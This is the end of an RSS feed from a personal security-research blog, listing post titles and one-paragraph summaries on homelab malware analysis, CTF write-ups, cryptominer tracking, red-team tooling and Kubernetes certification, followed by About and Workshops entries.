      <guid>/projects/r2_shellcode_generation/</guid>
      <description>About The Project With IDA Pro&amp;rsquo;s recent announcement of moving to a subscription model, some are revisiting the current state of available decompilers. Off the top of my head you have Hopper, Ghidra, Radare2/Cutter, and of course Binary Ninja. Each of these utilities has its own pros and cons, and depending on how frequently you spend time reverse engineering, one may make more sense than another with regard to monetary investment.</description>
    </item>
    <item>
      <title>Diving Into Kubernetes: Preparing for the CKA</title>
      <link>/projects/diving-into-kubernetes/</link>
      <pubDate>Mon, 06 Sep 2021 00:00:00 +0000</pubDate>
      <guid>/projects/diving-into-kubernetes/</guid>
      <description>Preparing for The CKA &amp;amp; Diving into the Kubes I recently passed the Linux Foundation&amp;rsquo;s Certified Kubernetes Administrator (CKA) certification and thought I&amp;rsquo;d throw some notes together on how I prepared. The CKA is a hands-on practical test. There are no multiple-choice questions, just raw application of Kubernetes knowledge.&#xA;Overall I enjoyed the CKA, and find that the exam questions reflect real-world examples of the day-to-day tasks I run into with Kubernetes.</description>
    </item>
    <item>
      <title>Two Years Blogging - A Review of Designing Homelab Projects</title>
      <link>/projects/two_years_blogging/</link>
      <pubDate>Sun, 15 Aug 2021 00:00:00 +0000</pubDate>
      <guid>/projects/two_years_blogging/</guid>
      <description>The Art of The Homelab I&amp;rsquo;ve been homelabbing/blogging about side projects for about two years now and thought I&amp;rsquo;d compile a list of things that have been useful to me in my homelabbing journey. These are just my opinions and everyone&amp;rsquo;s goals for their homelab are different. I view my homelab as a blank canvas upon which to experiment, fail, learn and share said failures (or successes) with others. It&amp;rsquo;s a labor of love, but nothing makes my day like a YouTube/Reddit comment that says &amp;ldquo;hey this is awesome, thank you for sharing&amp;rdquo;.</description>
    </item>
    <item>
      <title>Threat Intelligence in the Homelab</title>
      <link>/projects/threat-intel-in-the-homelab/</link>
      <pubDate>Thu, 29 Apr 2021 02:30:00 +0000</pubDate>
      <guid>/projects/threat-intel-in-the-homelab/</guid>
      <description>About The Project Threat Intelligence comes in many forms and services that help the analyst, incident responder, reverse engineer, etc&amp;hellip; stay aware of ongoing threats against enterprise environments.&#xA;As a home lab enthusiast, I don&amp;rsquo;t have access to enterprise subscriptions (ex: VirusTotal) to obtain insight into the latest threats. Luckily for the community, several free resources exist. This blog post focuses on how I leverage free or low-cost services to gain a deeper understanding of malicious domains and obtain malware samples to analyze.</description>
    </item>
    <item>
      <title>Poking At Elasticsearch: Beyond Just Dumping Data</title>
      <link>/projects/poking-at-elasticsearch-beyond-dumping-data/</link>
      <pubDate>Sun, 28 Mar 2021 00:00:00 +0000</pubDate>
      <guid>/projects/poking-at-elasticsearch-beyond-dumping-data/</guid>
      <description>About The Project Elasticsearch is a key component in many backend centralized logging stacks. Several Open Source and commercial software appliances leverage Elasticsearch in one way or another. This is especially true for the SIEM space. While there are many blogs on how to assess/extract data from an Elasticsearch cluster during a pentest/red team assessment, I have not seen a lot of conversations on how the discovery of an Elasticsearch server can be leveraged beyond just dumping data.</description>
    </item>
    <item>
      <title>Tracking Cryptocurrency Malware In The Homelab - Pt 2</title>
      <link>/projects/tracking-crypto-miners-in-the-homelab-2-new-tricks/</link>
      <pubDate>Sat, 20 Feb 2021 12:50:00 +0000</pubDate>
      <guid>/projects/tracking-crypto-miners-in-the-homelab-2-new-tricks/</guid>
      <description>About The Project Continuing from the last blog post that discussed malicious Linux Cryptocurrency miners, I have discovered new activity that blends two of my previous Cryptocurrency mining malware (aka Cryptojacking) blog posts.&#xA;By taking a deeper look at infrastructure and code artifacts, some interesting parallels can be drawn between the same actor(s) that Trend Micro refers to as Skidmap and another Golang Cryptojacking malware variant that Palo Alto has just recently deemed &amp;ldquo;Watchdog&amp;rdquo;.</description>
    </item>
    <item>
      <title>Auditd CVE 2021-3156</title>
      <link>/projects/auditd-cve-2021-3156/</link>
      <pubDate>Fri, 12 Feb 2021 00:00:00 +0000</pubDate>
      <guid>/projects/auditd-cve-2021-3156/</guid>
      <description>About The Project CVE-2021-3156 is a 10-year-old sudo vulnerability that allows for privilege escalation in Linux environments. If you&amp;rsquo;re responsible for a Linux server, this definitely caught your attention due to the severity. Some rough PoCs wound up on GitHub and also on exploit-db recently. Besides patching through upstream provider-supplied patches [0,1], how would you hunt for this in your environment? This leads me to leveraging auditd in the previously blogged about red team range.</description>
    </item>
    <item>
      <title>Introduction to Ghidra Scripting for Embedded ELFs and UPX</title>
      <link>/projects/ghidra_scripting_01/</link>
      <pubDate>Fri, 22 Jan 2021 22:22:22 +0000</pubDate>
      <guid>/projects/ghidra_scripting_01/</guid>
      <description>About the Project The more Cryptominer malware I look at (or anything targeting Linux), the more trends I&amp;rsquo;ve identified that are common regardless of the underlying intent. Everyone loves to use UPX.&#xA;And why wouldn&amp;rsquo;t they? It&amp;rsquo;s a free Open Source packer that you can modify if you so choose, or leverage what&amp;rsquo;s available in most Linux distribution repos. Everyone loves embedding ELFs in ELFs.&#xA;In my anecdotal analysis, Cryptominers have triaged systems for basic OS information before deciding which 2nd stage payload to drop.</description>
    </item>
    <item>
      <title>DLL Hijacking for Persistence - SteelSeries Engine</title>
      <link>/projects/dll-hijacking-for-persistence/</link>
      <pubDate>Sun, 06 Dec 2020 00:00:00 +0000</pubDate>
      <guid>/projects/dll-hijacking-for-persistence/</guid>
      <description>About The Project With the pandemic in full swing and work from home being normal, it&amp;rsquo;s natural to upgrade your home setup to make work as enjoyable as possible. Maybe you don&amp;rsquo;t have those nice monitors at home that you do have at work, but hey, at least you bought a new mouse and no longer have to use the trackpad! This is where the project comes into play.</description>
    </item>
    <item>
      <title>Tracking Cryptocurrency Malware in The Homelab</title>
      <link>/projects/tracking_cryptominer_domains/</link>
      <pubDate>Thu, 26 Nov 2020 00:00:00 +0000</pubDate>
      <guid>/projects/tracking_cryptominer_domains/</guid>
      <description>About the Project Since July of 2020, I have been running a &amp;ldquo;honeypot&amp;rdquo; of sorts made by anthok to capture all requests coming in on specific ports. By listening on ports commonly used by databases such as Elasticsearch or Redis, we&amp;rsquo;ve been able to observe a lot of bot behavior. Most of the requests resulted in trying to gain an initial foothold onto the environment to run a bash script to bring down their stage-1 malware.</description>
    </item>
    <item>
      <title>Exploits in The Attic - Visiting Forgotten Metasploit Modules</title>
      <link>/projects/exploits-in-the-attic/</link>
      <pubDate>Thu, 19 Nov 2020 00:00:00 +0000</pubDate>
      <guid>/projects/exploits-in-the-attic/</guid>
      <description>About The Project - Taking a look in the Attic I was poking around at PRs and issues within the Metasploit project and stumbled across something pretty interesting. There&amp;rsquo;s a GitHub label that exists within the Metasploit project called &amp;ldquo;attic&amp;rdquo;.&#xA;The &amp;ldquo;attic&amp;rdquo; label from my observations appears to be for modules that maintainers or contributors need to finish up but don&amp;rsquo;t quite have the time. Much like that shoebox full of comic books, you carefully set it aside in the attic to return to it at a later date (if at all).</description>
    </item>
    <item>
      <title>Dumping Memory with AV - Avast Home Security</title>
      <link>/projects/dumping-memory-with-av/</link>
      <pubDate>Wed, 18 Nov 2020 00:00:00 +0000</pubDate>
      <guid>/projects/dumping-memory-with-av/</guid>
      <description>About The Project Tools native to an operating system that can be leveraged offensively are always attractive to red teamers. You can go a long way with PowerShell and other native Windows utilities during engagements, but perhaps sometimes these utilities are too loud for your use case.&#xA;With PowerShell script block and PowerShell module logging enabled within an environment, you&amp;rsquo;re being detected along the way. Wouldn&amp;rsquo;t it be nice if there were various tools already installed that can be leveraged for offensive purposes?</description>
    </item>
    <item>
      <title>Signed Binary Proxy Execution via PyCharm</title>
      <link>/projects/signed_binary_proxy_execution/</link>
      <pubDate>Tue, 13 Oct 2020 22:33:36 -0400</pubDate>
      <guid>/projects/signed_binary_proxy_execution/</guid>
      <description>About the Project Signed Binary Proxy Execution is a method of executing a command or executable by proxy of another signed executable. This method can be leveraged by those in the offensive computing community to bypass defensive mechanisms. By leveraging an executable that has been digitally signed, the trust of that application is being used to perform a particular malicious action. This post explores leveraging Signed Binary Proxy Execution via PyCharm, a popular Python IDE.</description>
    </item>
    <item>
      <title>Analysis of a Cryptocurrency Miner Malware &amp; Associated Payloads</title>
      <link>/projects/analysis_of_a_cryptocurrency_miner/</link>
      <pubDate>Sun, 02 Aug 2020 00:00:00 +0000</pubDate>
      <guid>/projects/analysis_of_a_cryptocurrency_miner/</guid>
      <description>About The Project Given the recent news of the Meow attacks, I was curious about obtaining malware data related to Elasticsearch attacks. I&amp;rsquo;m a huge fan of Elasticsearch and use it heavily in my side-projects. I&amp;rsquo;m aware of the dangers of exposing a fresh database install on the open internet. So I simply set up a netcat listener and redirected the output to a file. I was pleasantly surprised at how successful this was.</description>
    </item>
    <item>
      <title>Modifying PoshC2 Initial Droppers</title>
      <link>/projects/poshc2-payloads/</link>
      <pubDate>Thu, 16 Jul 2020 00:00:00 +0000</pubDate>
      <guid>/projects/poshc2-payloads/</guid>
      <description>About the Project At the time of this writing PoshC2 has a Python and Bash agent that can be deployed on a target machine. Both utilities offer a plethora of ways that can be modified to achieve execution and initial delivery in unique ways. The lovely thing about Linux is that there is always another way to achieve the same goal. This second video in Arch Cloud Lab’s PoshC2 series explores how to begin making basic changes to the PoshC2 dropper as well as some inspiration for others to go and do more.</description>
    </item>
    <item>
      <title>Getting Started with PoshC2 in a Linux Environment</title>
      <link>/projects/poshc2-intro/</link>
      <pubDate>Sat, 27 Jun 2020 00:00:00 +0000</pubDate>
      <guid>/projects/poshc2-intro/</guid>
      <description>About the Project For the first time Arch Cloud Labs will be posting a video tutorial on how to get started with PoshC2 in a Linux environment. This video assumes some prior experience with Linux/offensive tooling frameworks, and provides just enough information to get you up and running with PoshC2. For those interested in what the exact configurations used in the video were, please checkout the snippets below.&#xA;Check out the video here.</description>
    </item>
    <item>
      <title>A Red Team Range In The Home Lab</title>
      <link>/projects/redteam_range/</link>
      <pubDate>Sat, 16 May 2020 13:30:36 -0400</pubDate>
      <guid>/projects/redteam_range/</guid>
      <description>About the Project C2 Frameworks seem to keep popping up with neat features and add-ons. I wanted to create a lab environment where I could experiment with said utilities, and understand what the forensic footprint looked like for each tool. This led to “shellcompany.lan”, my red team range environment for tool testing and experimentation.&#xA;Environment Considerations &amp;amp; Initial Design When initially designing the environment, I wanted to emulate a small business network with significant logging of both host and network data.</description>
    </item>
    <item>
      <title>Houseplant CTF 2020 - Imagery</title>
      <link>/projects/houseplant_ctf/</link>
      <pubDate>Mon, 27 Apr 2020 21:30:36 -0400</pubDate>
      <guid>/projects/houseplant_ctf/</guid>
      <description>Houseplant CTF 2020 - Imagery CTF challenge &amp;ldquo;Imagery&amp;rdquo; was a high-value forensics puzzle with the following description:&#xA;Photography is good fun. I took a photo of my 10 Windows earlier on but it turned out too big for my photo viewer. Apparently 2GB is too big. :( https://drive.google.com/file/d/1y4sfIaUrAOK0wXiDZXiOI-q2SYs6M--g/view?usp=sharing Alternate: https://mega.nz/file/R00hgCIa#e0gMZjsGI0cqw88GzbEzKhcijWGTEPQsst4QMfRlNqg Dev: Tom Upon downloading the image, I originally ran basic forensic triaging tools on the large blob in an attempt to identify what it was.</description>
    </item>
    <item>
      <title>Covid-19 Domain Analysis</title>
      <link>/projects/covid19-domain-analysis/</link>
      <pubDate>Sun, 29 Mar 2020 14:33:36 -0400</pubDate>
      <guid>/projects/covid19-domain-analysis/</guid>
      <description>About The Project Over the past two weeks, I have been analyzing registered domain names correlated to the current pandemic as a side project. This was all inspired by @jeremiahg&amp;rsquo;s tweet about the ever-growing number of registered domains related to &amp;ldquo;covid-19&amp;rdquo;.&#xA;During times of crisis, malicious actors act to profit on those in fear or those showing compassion for their fellow humans. One avenue of profit is phishing. There is no shortage of historical data relating to scams during times of crisis ([0][1][2]) to capitalize on fear (click this to be safe) and sympathy (donate here for a good cause).</description>
    </item>
    <item>
      <title>Vimrc As A Persistence Mechanism</title>
      <link>/projects/vimrc-as-a-persistence-mechanism/</link>
      <pubDate>Wed, 04 Mar 2020 22:00:36 -0400</pubDate>
      <guid>/projects/vimrc-as-a-persistence-mechanism/</guid>
      <description>ISTS - Collegiate Red vs Blue Competition This past weekend the Rochester Institute of Technology&amp;rsquo;s security club ritsec put on their annual Information Security Talent Search competition. This competition requires Blue Team members to keep critical services (logging clusters, web servers, Active Directory, etc&amp;hellip;) running, complete business injects and provide customer support all while being infiltrated by a Red Team. A big twist on this competition is that the Blue Teams can attack other Blue Team members.</description>
    </item>
    <item>
      <title>Forensic Fortress - Shmoocon 2020</title>
      <link>/projects/forensic_fortress/</link>
      <pubDate>Thu, 06 Feb 2020 18:33:36 -0400</pubDate>
      <guid>/projects/forensic_fortress/</guid>
      <description>Hack Fortress: Forensic Challenges This past Shmoocon, the Hack Fortress group returned to deliver another action-packed day of Team Fortress 2 and hacking. As previously discussed, Hack Fortress is a combination of a First Person Shooter (Team Fortress 2) and a jeopardy style CTF. Teams of ten are assembled with six gamers and four hackers in a single-elimination bracket. Hackers solve challenges and unlock points to buy in-game items for gamers.</description>
    </item>
    <item>
      <title>Is This Normal? - NSRL with Malware Analysis</title>
      <link>/projects/is-this-normal/</link>
      <pubDate>Thu, 26 Dec 2019 13:30:36 -0400</pubDate>
      <guid>/projects/is-this-normal/</guid>
      <description>About The Project Continuing from my Malware Analysis Pipeline project, I have been spending some time tearing apart samples trying to get better at malware analysis. Doing so, I run across files that I&amp;rsquo;ve never heard of before. Obviously, Google is the first stop during the triage period of an unknown function call/DLL, etc&amp;hellip; However, what if the DLL dropped was a modified version of a legitimate application?&#xA;This is where the NSRL comes into play.</description>
    </item>
    <item>
      <title>Building A Simple Malware Analysis Pipeline In The Homelab Pt - 2</title>
      <link>/projects/malware-analysis-pipeline-2/</link>
      <pubDate>Mon, 11 Nov 2019 16:00:36 -0400</pubDate>
      <guid>/projects/malware-analysis-pipeline-2/</guid>
      <description>About The Project In a previous blog post, I covered how I was obtaining samples, extracting metadata, and querying the results. I&amp;rsquo;ve moved from testing in Docker containers to stand-alone VMs. Since I have a steady flow of binaries, I need to tag the binaries with something meaningful, so I&amp;rsquo;m not just aimlessly looking through binary after binary. YARA was the answer for tagging samples. Additional minor improvements were also made in the homelab to prevent any accidental malware execution.</description>
    </item>
    <item>
      <title>Building A Simple Malware Analysis Pipeline In The Homelab Pt - 1</title>
      <link>/projects/malware-analysis-pipeline-1/</link>
      <pubDate>Tue, 29 Oct 2019 14:33:36 -0400</pubDate>
      <guid>/projects/malware-analysis-pipeline-1/</guid>
      <description>About The Project I wanted to further my malware analysis/reverse engineering skills and create a simple malware analysis pipeline. The pipeline I planned to build can be seen below.&#xA;By collecting metadata about the binaries (imports/exports/pdbs/etc&amp;hellip;) I can quickly filter and pivot on a subset of features that interest me. Over time it may be possible to enrich this data and have something really unique in the old homelab. However, before any analysis can begin I need to acquire samples.</description>
    </item>
    <item>
      <title>Dungeons &amp; Hackers - Level 1</title>
      <link>/projects/re-1/</link>
      <pubDate>Wed, 02 Oct 2019 18:33:36 -0400</pubDate>
      <guid>/projects/re-1/</guid>
      <description>Hack Fortress RE Challenge: Troll Hunter What is Hack Fortress? Hack Fortress is a combination of a First Person Shooter (Team Fortress 2) and a jeopardy style CTF. Teams of ten are assembled with six gamers and four hackers in a single-elimination bracket. Hackers solve challenges and unlock points to buy in-game items for gamers. Each round is thirty minutes long except for the finals which run for forty-five minutes. This event has been running consistently at DEF CON and Shmoocon for almost ten years!</description>
    </item>
    <item>
      <title>New Homelab</title>
      <link>/projects/new-homelab/</link>
      <pubDate>Sun, 22 Sep 2019 22:22:22 +0000</pubDate>
      <guid>/projects/new-homelab/</guid>
      <description>Why Build it? - The Origin Story Scrolling through Twitter and seeing my InfoSec friends and role models post crazy malware analysis writeups, CVE disclosures, and custom tool blog posts; I ask myself &amp;ldquo;How can I become better?&amp;rdquo;. How can I advance and diversify my skillset from the 9-5 I currently have? From my experience &amp;ldquo;homelabbing&amp;rdquo;, CTFs and conference talks have increased my perspective and exposure to technologies and ideas I otherwise would not normally encounter.</description>
    </item>
    <item>
      <title>About</title>
      <link>/about/welcome/</link>
      <pubDate>Sun, 22 Sep 2019 22:20:50 +0000</pubDate>
      <guid>/about/welcome/</guid>
      <description>Welcome to Arch Cloud Labs! Arch Cloud Labs is a personal blog site for my side projects, CTF write-ups, independent research, and other ramblings. All content here is done on the author&amp;rsquo;s own time and does not reflect the view of their employer(s).&#xA;Talks&#xA;DEF CON 2023 - WINE Pairing with Malware&#xA;DevSecOps Days 2023 - Golfing with Dragons: Building Secure Environments for CTF Competitions&#xA;ATT&amp;amp;CKCON 3.0 2022 - ATT&amp;amp;CKING Containers in The Cloud&#xA;SANS 2021 Blue Team Summit (Lightning Talk) - Living off The Cloud&#xA;DEF CON 2021 - Strace for Binary Analysis&#xA;Interpol Digital Forensics Expert Group (DFEG) 2020 - Down with The Sickness: Hunting COVID-19 Phishing Domains&#xA;Shmoocon 2019 - Weapons of Text Destruction&#xA;DFRWS-EU 2018 - CASE Technical Implementation Workshop&#xA;BSides Roc 2016 - RedOps: Scaling Your Pwnage&#xA;Other Notable Mentions&#xA;VX-Underground &amp;amp; SentinelOne: Malware Competition Finalist&#xA;Exploitable Bugs in Cryptocurrency Miners (No-CVE)&#xA;Local Privilege Escalation in Chef &amp;lt;= 12.</description>
    </item>
    <item>
      <title>Workshops</title>
      <link>/workshops/workshops/</link>
      <pubDate>Sun, 22 Sep 2019 22:20:50 +0000</pubDate>
      <guid>/workshops/workshops/</guid>
      <description>DIY Malware Homelab Course Do you have the desire to grow your skills in Malware Analysis, RE, and Software Engineering beyond just following tutorials? Arch Cloud Labs was built on honeypots and analyzing malware samples in a homelab environment to create a unique way to build those skills. This course offers a quick taste of building a malware analysis pipeline in your homelab to recreate analysis done by large firms as well as inspire you to do analysis of your own.</description>
    </item>
  </channel>
</rss>
